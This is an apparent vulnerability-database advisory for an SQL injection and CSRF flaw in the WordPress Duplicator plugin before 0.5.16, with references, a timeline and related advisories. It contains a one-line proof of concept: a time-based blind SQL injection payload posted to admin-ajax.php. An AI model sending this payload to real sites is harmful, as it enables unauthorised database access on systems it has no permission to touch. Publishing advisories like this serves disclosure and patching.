Duplicator < 0.5.16 – SQL Injection & CSRF | Plugin Vulnerabilities

Description

An authorised user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin (CSRF).

Proof of Concept

http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_package_delete
 
POST Data: duplicator_delid=1 and (select * from (select(sleep(20)))a)

Affects Plugins

Fixed in 0.5.16

References

Exploitdb

URL

https://packetstormsecurity.com/files/#131377/

URL

https://www.homelab.it/index.php/2015/04/10/wordpress-duplicator-0-5-14-sql-injection-vulnerability/

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

Claudio Viviani

Submitter website

http://www.homelab.it

Submitter twitter

Verified

No

WPVDB ID

82164d2b-5be8-4cc1-a61e-70038e60b20b

Timeline

Publicly Published

2015-04-10 (about 11 years ago)

Added

2015-04-10 (about 11 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2024-10-18

Title

Social Link Groups <= 1.1.0 - Authenticated (Contributor+) SQL Injection

Published

2014-08-01

Title

Facebook Promotions <= 1.3.3 - SQL Injection

Published

2023-10-30

Title

Image vertical reel scroll slideshow < 9.1 - Authenticated (Subscriber+) SQL Injection via Shortcode

Published

2015-03-18

Title

Easy Digital Downloads < 2.3.3 - SQL Injection

Published

2026-01-08

Title

WooCommerce Orders & Customers Exporter <= 5.4 - Authenticated (Subscriber+) SQL Injection